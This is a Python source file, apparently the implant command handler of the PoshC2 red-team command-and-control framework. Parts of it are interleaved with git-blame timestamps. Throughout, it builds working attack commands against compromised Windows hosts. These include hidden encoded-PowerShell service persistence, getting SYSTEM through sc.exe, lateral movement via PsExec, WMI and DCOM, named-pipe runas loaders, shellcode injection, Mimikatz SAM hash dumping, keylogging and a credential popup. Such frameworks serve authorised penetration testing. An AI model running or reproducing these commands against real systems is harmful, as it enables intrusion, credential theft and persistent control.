new_task(taskcmd, user, randomuri)
|
2018-08-03 21:47:56 +00:00
|
|
|
|
2018-08-15 10:56:08 +00:00
|
|
|
elif "kill-implant" in command.lower() or "exit" in command.lower():
|
|
|
|
impid = get_implantdetails(randomuri)
|
|
|
|
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
|
|
|
|
if ri.lower() == "n":
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("Implant not terminated")
|
2018-08-15 10:56:08 +00:00
|
|
|
if ri == "":
|
|
|
|
pid = get_pid(randomuri)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("kill -9 %s" % pid, user, randomuri)
|
2018-08-15 10:56:08 +00:00
|
|
|
kill_implant(randomuri)
|
|
|
|
if ri.lower() == "y":
|
|
|
|
pid = get_pid(randomuri)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("kill -9 %s" % pid, user, randomuri)
|
2018-08-15 10:56:08 +00:00
|
|
|
kill_implant(randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2019-01-13 16:16:09 +00:00
|
|
|
|
|
|
|
elif "linuxprivchecker" in command.lower():
|
|
|
|
params = re.compile("linuxprivchecker", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
|
|
|
module = open("%slinuxprivchecker.py" % ModulesDirectory, 'r').read()
|
|
|
|
encoded_module = base64.b64encode(module)
|
|
|
|
taskcmd = "linuxprivchecker -pycode %s %s" % (encoded_module, params)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(taskcmd, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
else:
|
|
|
|
if command:
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(command, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
return
|
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
elif implant_type == "C#":
|
2018-12-30 23:52:39 +00:00
|
|
|
try:
|
2019-02-11 21:00:56 +00:00
|
|
|
check_module_loaded("Stage2-Core.exe", randomuri, user)
|
2018-12-30 23:52:39 +00:00
|
|
|
except Exception as e:
|
2019-02-11 21:00:56 +00:00
|
|
|
print ("Error loading Stage2-Core.exe: %s" % e)
|
2019-02-03 19:50:40 +00:00
|
|
|
|
|
|
|
# alias mapping
|
|
|
|
for alias in cs_alias:
|
|
|
|
if alias[0] == command.lower()[:len(command.rstrip())]:
|
|
|
|
command = alias[1]
|
2018-12-30 23:52:39 +00:00
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
if "searchhelp" in command.lower():
|
|
|
|
searchterm = (command.lower()).replace("searchhelp ","")
|
|
|
|
import string
helpfull = string.split(sharp_help1, '\n')
for line in helpfull:
if searchterm in line.lower():
print (line)
elif "upload-file" in command.lower():
source = ""
destination = ""
s = ""
if command.strip().lower() == "upload-file":
source = readfile_with_completion("Location of file to upload: ")
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = readfile_with_completion("Location of file to upload: ")
destination = raw_input("Location to upload to: ")
else:
args = argp(command)
source = args.source
destination = args.destination
try:
with open(source, "rb") as source_file:
s = source_file.read()
if s:
sourceb64 = base64.b64encode(s)
destination = destination.replace("\\","\\\\")
print ("")
print ("Uploading %s to %s" % (source, destination))
uploadcommand = "upload-file%s;\"%s\"" % (sourceb64, destination)
new_task(uploadcommand, user, randomuri)
else:
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
traceback.print_exc()
elif "unhide-implant" in command.lower():
unhide_implant(randomuri)
elif "hide-implant" in command.lower():
kill_implant(randomuri)
elif "safetydump" in command.lower():
check_module_loaded("SafetyDump.exe", randomuri, user)
new_task(command, user, randomuri)
elif "inject-shellcode" in command.lower():
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
path = readfile_with_completion("Location of shellcode file: ")
try:
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
new_task("exit",user, randomuri)
kill_implant(randomuri)
elif "seatbelt " in command.lower():
check_module_loaded("Seatbelt.exe", randomuri, user)
new_task(command, user, randomuri)
elif (command.lower().startswith("stop-keystrokes")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-keystrokes")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-screenshotmulti")):
new_task(command, user, randomuri)
elif (command.lower().startswith("get-screenshot")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("arpscan")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("testadcredential")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("testlocalcredential")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("turtle")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-userinfo")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-content")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("resolvednsname")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("resolveip")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("cred-popper")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("get-serviceperms")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("move")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("delete")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower().startswith("ls")):
new_task("run-exe Core.Program Core %s" % command, user, randomuri)
elif (command.lower() == "pwd") or (command.lower() == "pwd "):
new_task("run-exe Core.Program Core pwd", user, randomuri)
elif (command.lower() == "ps") or (command.lower() == "ps "):
new_task("run-exe Core.Program Core Get-ProcessList", user, randomuri)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
elif "listmodules" in command.lower():
modules = os.listdir("%s/Modules/" % POSHDIR)
print ("")
print ("[+] Available modules:")
print ("")
for mod in modules:
if (".exe" in mod) or (".dll" in mod) :
print (mod)
new_task(command, user, randomuri)
elif "modulesloaded" in command.lower():
ml = get_implantdetails(randomuri)
print (ml[14])
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (sharp_help1)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
startup(user)
elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '')
if not validate_sleep_time(new_sleep):
print(Colours.RED)
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
else:
new_task(command, user, randomuri)
update_sleep(new_sleep, randomuri)
elif (command.lower().startswith('label-implant')):
label = command.replace('label-implant ', '')
update_label(label, randomuri)
startup(user)
else:
if command:
new_task(command, user, randomuri)
return
else:
try:
check_module_loaded("Stage2-Core.ps1", randomuri, user)
except Exception as e:
print ("Error loading Stage2-Core.ps1: %s" % e)
run_autoloads(command, randomuri, user)
# alias mapping
for alias in ps_alias:
if alias[0] == command.lower()[:len(command.rstrip())]:
command = alias[1]
# opsec failures
for opsec in ps_opsec:
if opsec == command.lower()[:len(opsec)]:
print (Colours.RED)
print ("**OPSEC Warning**")
impid = get_implantdetails(randomuri)
ri = raw_input("Do you want to continue running - %s? (y/N) " % command)
if ri.lower() == "n":
command = ""
if ri == "":
command = ""
if ri.lower() == "y":
command = command
if ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '')
if not validate_sleep_time(new_sleep):
print(Colours.RED)
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
else:
new_task(command, user, randomuri)
update_sleep(new_sleep, randomuri)
elif (command.lower().startswith('label-implant')):
label = command.replace('label-implant ', '')
update_label(label, randomuri)
startup(user)
elif "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(posh_help, '\n')
for line in helpfull:
if searchterm in line.lower():
print (line)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
startup(user)
elif "install-servicelevel-persistencewithproxy" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif "install-servicelevel-persistence" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif "remove-servicelevel-persistence" in command.lower():
new_task("sc.exe delete CPUpdater", user, randomuri)
# psexec lateral movement
elif "get-implantworkingdirectory" in command.lower():
new_task("pwd", user, randomuri)
elif "get-system-withproxy" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "get-system-withdaisy" in command.lower():
C2 = get_c2server_all()
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "get-system" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "quit" in command.lower():
ri = raw_input("Are you sure you want to quit? (Y/n) ")
if ri.lower() == "n":
startup(user)
if ri == "":
sys.exit(0)
if ri.lower() == "y":
sys.exit(0)
elif "invoke-psexecproxypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createproxypayload first")
elif "invoke-psexecdaisypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif "invoke-psexecpayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-psexecpayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
new_task(cmd, user, randomuri)
# wmi lateral movement
elif "invoke-wmiproxypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createproxypayload first")
elif "invoke-wmidaisypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif "invoke-wmipayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-wmipayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
new_task(cmd, user, randomuri)
# dcom lateral movement
elif "invoke-dcomproxypayload" in command.lower():
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
p = re.compile(ur'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
else:
startup(user, "Need to run createproxypayload first")
elif "invoke-dcomdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
p = re.compile(ur'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif "invoke-dcompayload" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
p = re.compile(ur'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
# runas payloads
elif "invoke-runasdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
new_task("$proxypayload = \"%s\"" % payload, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeDaisy.ps1", randomuri, user)
params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif "invoke-runasproxypayload" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload
new_task(proxyvar, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeProxy.ps1", randomuri, user)
params = re.compile("invoke-runasproxypayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
elif "invoke-runaspayload" in command.lower():
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipe.ps1", randomuri, user)
params = re.compile("invoke-runaspayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (posh_help)
elif command.lower() == "help 1":
print (posh_help1)
elif command.lower() == "help 2":
print (posh_help2)
elif command.lower() == "help 3":
print (posh_help3)
elif command.lower() == "help 4":
print (posh_help4)
elif command.lower() == "help 5":
print (posh_help5)
elif command.lower() == "help 6":
print (posh_help6)
elif command.lower() == "help 7":
print (posh_help7)
elif command.lower() == "help 8":
print (posh_help8)
elif "get-pid" in command.lower():
pid = get_implantdetails(randomuri)
print (pid[8])
elif "upload-file" in command.lower():
source = ""
destination = ""
s = ""
nothidden = False
if command.strip().lower() == "upload-file":
source = readfile_with_completion("Location of file to upload: ")
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = readfile_with_completion("Location of file to upload: ")
destination = raw_input("Location to upload to: ")
else:
args = argp(command)
source = args.source
destination = args.destination
nothidden = args.nothidden
try:
with open(source, "rb") as source_file:
s = source_file.read()
if s:
sourceb64 = base64.b64encode(s)
destination = destination.replace("\\","\\\\")
print ("")
print ("Uploading %s to %s" % (source, destination))
if (nothidden):
uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64)
else:
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64)
new_task(uploadcommand, user, randomuri)
else:
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e )
traceback.print_exc()
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
new_task("exit", user, randomuri)
kill_implant(randomuri)
elif "unhide-implant" in command.lower():
unhide_implant(randomuri)
elif "hide-implant" in command.lower():
kill_implant(randomuri)
elif "migrate" in command[:7].lower():
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
migrate(randomuri, params)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
elif "invoke-daisychain" in command.lower():
check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
urls = get_allurls()
new_task("%s -URLs '%s'" % (command,urls), user, randomuri)
print ("Now use createdaisypayload")
elif "inject-shellcode" in command.lower():
#elif (command.lower() == "inject-shellcode") or (command.lower() == "inject-shellcode "):
|
|
|
|
params = re.compile("inject-shellcode", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
readline.set_completer(filecomplete)
|
|
|
|
path = raw_input("Location of shellcode file: ")
|
|
|
|
t = tabCompleter()
|
|
|
|
t.createListCompleter(COMMANDS)
|
|
|
|
readline.set_completer(t.listCompleter)
|
|
|
|
try:
|
|
|
|
shellcodefile = load_file(path)
|
|
|
|
if shellcodefile != None:
|
|
|
|
arch = "64"
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
|
|
|
|
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
except Exception as e:
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("Error loading file: %s" % e)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
elif "listmodules" in command.lower():
|
2018-10-27 18:50:47 +00:00
|
|
|
print (os.listdir("%s/Modules/" % POSHDIR))
|
2018-07-23 08:55:15 +00:00
|
|
|
|
2018-12-27 12:10:46 +00:00
|
|
|
elif "modulesloaded" in command.lower():
|
2018-07-23 08:55:15 +00:00
|
|
|
ml = get_implantdetails(randomuri)
|
2018-10-27 18:50:47 +00:00
|
|
|
print (ml[14])
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif (command.lower() == "ps") or (command.lower() == "ps "):
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("get-processlist", user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif (command.lower() == "hashdump") or (command.lower() == "hashdump "):
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
|
|
|
|
new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif (command.lower() == "sharpsocks") or (command.lower() == "sharpsocks "):
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("SharpSocks.ps1", randomuri, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
import string
|
|
|
|
from random import choice
|
|
|
|
allchar = string.ascii_letters
|
|
|
|
channel = "".join(choice(allchar) for x in range(25))
|
|
|
|
sharpkey = gen_key()
|
|
|
|
sharpurls = get_sharpurls()
|
|
|
|
sharpurl = select_item("HostnameIP", "C2Server")
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), user, randomuri)
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("git clone https://github.com/nettitude/SharpSocks.git")
|
|
|
|
print ("SharpSocksServerTestApp.exe -c %s -k %s -l http://IPADDRESS:8080" % (channel,sharpkey))
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif (command.lower() == "history") or command.lower() == "history ":
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, get_history())
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "reversedns" in command.lower():
|
|
|
|
params = re.compile("reversedns ", re.IGNORECASE)
|
|
|
|
params = params.sub("", command)
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "createdaisypayload" in command.lower():
|
2018-10-10 07:16:32 +00:00
|
|
|
createdaisypayload()
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "createproxypayload" in command.lower():
|
2018-10-10 07:16:32 +00:00
|
|
|
createproxypayload()
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
elif "createnewpayload" in command.lower():
|
2018-10-10 07:16:32 +00:00
|
|
|
createproxypayload()
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
|
|
|
if command:
|
2019-02-11 17:05:14 +00:00
|
|
|
new_task(command, user, randomuri)
|
2018-07-23 08:55:15 +00:00
|
|
|
return
|
|
|
|
return
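def _install_completer(completer, commands):
    """Point readline tab-completion at *commands* via *completer*.

    Same three readline calls the loop used to repeat inline: tab-only
    delimiters, the ``tab: complete`` binding and the list completer.
    """
    completer.createListCompleter(commands)
    readline.set_completer_delims('\t')
    readline.parse_and_bind("tab: complete")
    readline.set_completer(completer.listCompleter)


def _read_command(implant_id, completer):
    """Print the prompt for *implant_id* and return the line the user typed.

    Multi-implant selectors (``all``, a comma list or an ``a-b`` range) are
    prompted for directly. A single id first fetches its host-details row;
    column 15 selects the OSX or C# completer set, and columns 11, 2, 3 and 8
    are shown as a ``DOMAIN\\user @ host (PID:n)`` banner above the prompt.
    """
    if ("-" in implant_id.lower()) or ("all" in implant_id.lower()) or ("," in implant_id.lower()):
        print (Colours.GREEN)
        return raw_input("%s> " % (implant_id))

    hostname = get_hostdetails(implant_id)
    if hostname[15] == 'OSX':
        _install_completer(completer, UXCOMMANDS)
    if hostname[15] == 'C#':
        _install_completer(completer, SHARPCOMMANDS)
    print (Colours.GREEN)
    print ("%s\\%s @ %s (PID:%s)" % (hostname[11],hostname[2], hostname[3],hostname[8]))
    return raw_input("%s> " % (implant_id))


def _dispatch(command, implant_id, user):
    """Run *command* against every implant that *implant_id* selects.

    Selector forms, tested in this order: the literal ``all`` (every row of
    get_implants(), column 1 being the randomuri), a comma-separated list of
    ids, an inclusive numeric range ``a-b``, or a single id. Ids other than
    ``all`` are resolved through get_randomuri() before runcommand() is
    called. The caller's *implant_id* is never rebound.
    """
    if implant_id.lower() == "all":
        if command == "back":
            startup(user)
        implants = get_implants()
        if implants:
            for row in implants:
                runcommand(command, row[1])
    elif "," in implant_id:
        for single_id in implant_id.split(","):
            runcommand(command, get_randomuri(single_id))
    elif "-" in implant_id:
        bounds = implant_id.split("-")
        for numeric_id in range(int(bounds[0]), int(bounds[1]) + 1):
            try:
                runcommand(command, get_randomuri(numeric_id))
            except Exception:
                # A gap in the range is reported and skipped, not fatal.
                print ("Unknown ImplantID")
    else:
        runcommand(command, get_randomuri(implant_id))

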